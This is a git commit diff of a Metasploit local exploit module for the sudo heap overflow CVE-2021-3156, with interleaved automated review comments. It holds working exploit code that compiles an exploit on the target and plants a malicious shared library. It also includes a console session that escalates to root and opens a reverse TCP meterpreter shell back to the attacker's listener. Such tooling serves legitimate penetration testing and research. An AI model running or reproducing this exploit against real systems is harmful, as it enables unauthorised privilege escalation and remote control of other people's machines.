Implement feedback from PR review

This commit is contained in:
Spencer McIntyre
2021-02-04 09:25:40 -05:00
parent c33c08bae9
commit 7281d00938
3 changed files with 32 additions and 54 deletions
@@ -1,14 +1,14 @@
## Vulnerable Application
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a `service_user` struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.
### Manual Target
The exploit requires a number of lengths / offsets to function correction. The manual target can be used to specify
The exploit requires a number of lengths / offsets to function correctly. The manual target can be used to specify
these values if they are known. To identify the values, use the `brute.sh` script from the original PoC repository at
[blasty/CVE-2021-3156][1].
@@ -41,7 +41,7 @@ Example steps in this format (is also in the PR):
1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/local/cve_2021_3156_sudo`
1. Do: `use exploit/linux/local/sudo_baron_samedit`
1. Set the necessary options (target, payload, etc.)
1. Do: `run`
@@ -82,15 +82,15 @@ BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2021_3156_sudo
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3156_sudo) > set SESSION 1
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > set LHOST 192.168.159.128
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/cve_2021_3156_sudo) > set TARGET 1
msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET 1
TARGET => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > exploit
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
+6 -3
@@ -15,14 +15,14 @@ module Compile
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
return false unless %w{ Auto True }.include?(datastore['COMPILE'])
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
unless datastore['COMPILE'] == 'Auto'
fail_with Module::Failure::BadConfig, 'gcc is not installed. Set COMPILE False to upload a pre-compiled executable.'
end
end
@@ -44,7 +44,10 @@ module Compile
unless output.blank?
print_error output
fail_with Module::Failure::BadConfig, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable."
message = "#{path}.c failed to compile."
# don't mention the COMPILE option if it was deregistered
message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE')
fail_with Module::Failure::BadConfig, message
end
chmod path
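Review bot: `live_compile?` in the first hunk returns nil rather than false when COMPILE is 'Auto' and `has_gcc?` is false, because the trailing `unless` is the method's last expression and its body is skipped; callers written as `if live_compile?` are unaffected, but a `?` predicate should yield a real boolean, so add `false` as the final line of the method after the `unless` block. The `return false unless %w{ Auto True }.include?(datastore['COMPILE'])` guard also means a module that has deregistered COMPILE (which presumably leaves `datastore['COMPILE']` nil) always gets false here and has to call `upload_and_compile` directly, which is what the deregistration elsewhere in this commit relies on; a comment on that guard such as `# nil when a module deregistered COMPILE: it must then call upload_and_compile directly` would record the contract. In the second hunk the `fail_with` message is correctly tailored to whether COMPILE is registered, but the compiler output in `output` comes from the target host, so `print_error output` echoes target-controlled text to the console; that is consistent with the rest of the mixin, just worth knowing. The method enclosing the second hunk starts outside it.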
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::Unix
include Msf::Post::Linux::Compile
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
@@ -17,10 +18,10 @@ class MetasploitModule < Msf::Exploit::Local
super(
update_info(
info,
'Name' => 'Heap-Based Buffer Overflow in Sudo',
'Name' => 'Sudo Heap-Based Buffer Overflow',
'Description' => %q(
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.
@@ -60,17 +61,15 @@ class MetasploitModule < Msf::Exploit::Local
)
)
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
], self.class
)
register_options([
OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
])
register_advanced_options(
[
OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/)
]
)
register_advanced_options([
OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/)
])
deregister_options('COMPILE')
end
def get_versions
@@ -81,13 +80,6 @@ class MetasploitModule < Msf::Exploit::Local
versions[:sudo] = version if version =~ /^\d/
end
# this libc version check will need to be updated to support non-linux targets like OSX
output = cmd_exec("ldd --version")
if output
version = output.split("\n").first.split(' ').last
versions[:libc] = version if version =~ /^\d/
end
versions
end
@@ -103,6 +95,11 @@ class MetasploitModule < Msf::Exploit::Local
[Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')],
]
if sudo_version == '1.8.31'
# Ubuntu patched it as version 1.8.31-1ubuntu1.2 which is reported as 1.8.31
return CheckCode::Detected("sudo #{sudo_version} maybe a vulnerable build.")
end
if vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) }
return CheckCode::Appears("sudo #{sudo_version} is a vulnerable build.")
end
@@ -115,25 +112,6 @@ class MetasploitModule < Msf::Exploit::Local
write_file path, data
end
def upload_and_compile(path, data)
upload "#{path}.c", data
register_files_for_cleanup("#{path}.c")
gcc_cmd = "gcc -o #{path} #{path}.c -lutil"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
register_files_for_cleanup(path)
cmd_exec "chmod +x #{path}"
end
def exploit
if target.name == 'Manual'
fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank?
@@ -146,13 +124,10 @@ class MetasploitModule < Msf::Exploit::Local
path = datastore['WritableDir']
cmd_exec("mkdir -p #{path}/libnss_X")
register_dirs_for_cleanup("#{path}/libnss_X")
file_name = rand_text_alphanumeric rand(5..10)
upload_and_compile("#{path}/#{file_name}", ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-3156', 'exploit.c')))
file_name = rand_text_alphanumeric(5..10)
upload_and_compile("#{path}/#{file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil')
upload("#{path}/libnss_X/P0P_SH3LLZ_ .so.2", generate_payload_dll)
cmd_exec("#{path}/#{file_name} #{arguments}")
end
end
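Review bot: In `exploit`, the operator-supplied `WritableDir` is interpolated unquoted into `cmd_exec("mkdir -p #{path}/libnss_X")` and into the final `cmd_exec("#{path}/#{file_name} #{arguments}")`, so a path containing spaces or shell metacharacters breaks both commands; quoting the path, e.g. `cmd_exec("mkdir -p '#{path}/libnss_X'")` and `cmd_exec("'#{path}/#{file_name}' #{arguments}")`, is the safer form. The payload library written to `#{path}/libnss_X/P0P_SH3LLZ_ .so.2` is never passed to `register_files_for_cleanup`; only the `libnss_X` directory is registered, so unless FileDropper removes registered directories recursively, the attacker-controlled `.so.2` is left on disk, and `register_files_for_cleanup("#{path}/libnss_X/P0P_SH3LLZ_ .so.2")` before the `upload` call makes the cleanup explicit either way. The removed local `upload_and_compile` registered both the `.c` source and the compiled binary for cleanup; the mixin version now called is outside this hunk, so it is worth confirming it does the same. The `exploit` method begins outside the hunk.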